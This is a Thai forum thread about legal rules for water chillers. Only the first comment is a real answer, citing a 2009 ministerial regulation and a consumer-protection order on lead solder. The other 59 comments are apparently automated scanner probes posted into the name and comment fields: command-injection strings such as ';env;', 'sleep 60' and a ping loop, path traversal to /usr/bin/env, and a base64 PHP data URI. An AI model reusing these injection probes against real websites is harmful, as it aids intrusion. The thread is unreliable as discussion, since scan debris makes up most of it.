ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:10:27 น.
 
ความคิดเห็นที่ 60
a`)`
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:10:27 น.
 
ความคิดเห็นที่ 59
data:;base64,PD9waHAgZWNobyAndzRwMXQxJywnX2V2YWwnOyA/Pg==
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:10:26 น.
 
ความคิดเห็นที่ 58
/e
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:10:22 น.
 
ความคิดเห็นที่ 57
env
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:10:22 น.
 
ความคิดเห็นที่ 56
set
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:10:22 น.
 
ความคิดเห็นที่ 55
&set&
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:10:22 น.
 
ความคิดเห็นที่ 54
Hi there!
env;
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:10:21 น.
 
ความคิดเห็นที่ 53
Hi there!;env;
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:10:21 น.
 
ความคิดเห็นที่ 52
../../../../../../../../../../../../../../../usr/bin/env|
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:10:21 น.
 
ความคิดเห็นที่ 51
a);env;
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:10:21 น.
 
ความคิดเห็นที่ 50
a;env;
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:10:20 น.
 
ความคิดเห็นที่ 49
|env
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:10:20 น.
 
ความคิดเห็นที่ 48
;env;
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:10:20 น.
 
ความคิดเห็นที่ 47
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:10:20 น.
 
ความคิดเห็นที่ 46
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:10:19 น.
 
ความคิดเห็นที่ 45
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:10:19 น.
 
ความคิดเห็นที่ 44
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:10:19 น.
 
ความคิดเห็นที่ 43
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:10:18 น.
 
ความคิดเห็นที่ 42
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:10:18 น.
 
ความคิดเห็นที่ 41
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:10:18 น.
 
ความคิดเห็นที่ 40
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:10:17 น.
 
ความคิดเห็นที่ 39
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:10:17 น.
 
ความคิดเห็นที่ 38
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:10:17 น.
 
ความคิดเห็นที่ 37
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:10:16 น.
 
ความคิดเห็นที่ 36
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:10:16 น.
 
ความคิดเห็นที่ 35
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:10:16 น.
 
ความคิดเห็นที่ 34
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:10:15 น.
 
ความคิดเห็นที่ 33
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:10:15 น.
 
ความคิดเห็นที่ 32
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:10:15 น.
 
ความคิดเห็นที่ 31
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:10:15 น.
 
ความคิดเห็นที่ 30
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:10:15 น.
 
ความคิดเห็นที่ 29
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:10:14 น.
 
ความคิดเห็นที่ 28
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:10:14 น.
 
ความคิดเห็นที่ 27
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:10:14 น.
 
ความคิดเห็นที่ 26
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:10:13 น.
 
ความคิดเห็นที่ 25
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:10:13 น.
 
ความคิดเห็นที่ 24
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:10:13 น.
 
ความคิดเห็นที่ 23
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:10:13 น.
 
ความคิดเห็นที่ 22
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:10:12 น.
 
ความคิดเห็นที่ 21
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:10:12 น.
 
ความคิดเห็นที่ 20
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:10:12 น.
 
ความคิดเห็นที่ 19
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:10:12 น.
 
ความคิดเห็นที่ 18
Hi there!
 
ผู้ตั้ง : &ping -n 25 127.0.0.1& วันที่ : 09 ส.ค. 64 06:10:11 น.
 
ความคิดเห็นที่ 17
Hi there!
 
ผู้ตั้ง : a|sleep 60; วันที่ : 09 ส.ค. 64 06:10:11 น.
 
ความคิดเห็นที่ 16
Hi there!
 
ผู้ตั้ง : a;sleep 60; วันที่ : 09 ส.ค. 64 06:10:11 น.
 
ความคิดเห็นที่ 15
Hi there!
 
ผู้ตั้ง : a`sleep 60` วันที่ : 09 ส.ค. 64 06:10:11 น.
 
ความคิดเห็นที่ 14
Hi there!
 
ผู้ตั้ง : a`)` วันที่ : 09 ส.ค. 64 06:10:11 น.
 
ความคิดเห็นที่ 13
Hi there!
 
ผู้ตั้ง : data:;base64,PD9waHAgZWNobyAndzRwMXQxJywnX2V2YWwnOyA/Pg== วันที่ : 09 ส.ค. 64 06:10:10 น.
 
ความคิดเห็นที่ 12
Hi there!
 
ผู้ตั้ง : /e วันที่ : 09 ส.ค. 64 06:10:05 น.
 
ความคิดเห็นที่ 11
Hi there!
 
ผู้ตั้ง : env วันที่ : 09 ส.ค. 64 06:10:05 น.
 
ความคิดเห็นที่ 10
Hi there!
 
ผู้ตั้ง : set วันที่ : 09 ส.ค. 64 06:10:05 น.
 
ความคิดเห็นที่ 9
Hi there!
 
ผู้ตั้ง : &set& วันที่ : 09 ส.ค. 64 06:10:04 น.
 
ความคิดเห็นที่ 8
Hi there!
 
ผู้ตั้ง : default env; วันที่ : 09 ส.ค. 64 06:10:04 น.
 
ความคิดเห็นที่ 7
Hi there!
 
ผู้ตั้ง : default;env; วันที่ : 09 ส.ค. 64 06:10:04 น.
 
ความคิดเห็นที่ 6
Hi there!
 
ผู้ตั้ง : ../../../../../../../../../../../../../../../usr/bin/env| วันที่ : 09 ส.ค. 64 06:10:04 น.
 
ความคิดเห็นที่ 5
Hi there!
 
ผู้ตั้ง : a);env; วันที่ : 09 ส.ค. 64 06:10:03 น.
 
ความคิดเห็นที่ 4
Hi there!
 
ผู้ตั้ง : a;env; วันที่ : 09 ส.ค. 64 06:10:03 น.
 
ความคิดเห็นที่ 3
Hi there!
 
ผู้ตั้ง : |env วันที่ : 09 ส.ค. 64 06:10:03 น.
 
ความคิดเห็นที่ 2
Hi there!
 
ผู้ตั้ง : ;env; วันที่ : 09 ส.ค. 64 06:10:02 น.
 
ความคิดเห็นที่ 1
จะต้องดูกฎหมายอีกฉบับหนึ่งครับ คือ กฎกระทรวงกำหนดเครื่องทำน้ำเย็นสำหรับระบบปรับอากาศที่มีประสิทธิภาพสูง พ.ศ. ๒๕๕๒ (ปรกาศในราชกิจจฯ วันที่ 8 เมย.2552) ซึ่งให้เหตุผลประกอบคือ โดยที่เป็นการสมควรกำหนดให้เครื่องทำน้ำเย็น
สำหรับระบบปรับอากาศที่มีค่าประสิทธิภาพพลังงานไม่เกินกว่าค่าที่กำหนดในกฎกระทรวงนี้ เป็นเครื่องทำ
น้ำเย็นสำหรับระบบปรับอากาศที่มีประสิทธิภาพสูง เพื่อประโยชน์ในการอนุรักษ์พลังงาน เพื่อให้ผู้ผลิตและ
ผู้จำหน่ายมีสิทธิขอรับการส่งเสริมและช่วยเหลือจากกองทุนเพื่อส่งเสริมการอนุรักษ์พลังงาน แต่ถ้าเป็นผู้ผลิตเครื่องทำน้ำเย็นสำหรับดื่ม ท่านจะต้องคำนึงถึงกฎหมายฉบับนี้ คือ คำสั่งคณะกรรมการคุ้มครองผู้บริโภค ที่ ๑๔/๒๕๕๑ เรื่อง ห้ามขายสินค้าเครื่องทำน้ำเย็นที่ใช้ตะกั่วเป็นตัวประสานรอยเชื่อมต่อของตะเข็บถังน้ำหรือท่อส่งน้ำ
 
ผู้ตั้ง : ปิยะชัย จันทรวงศ์ไพศาล วันที่ : 30 มิ.ย. 54 19:48:32 น.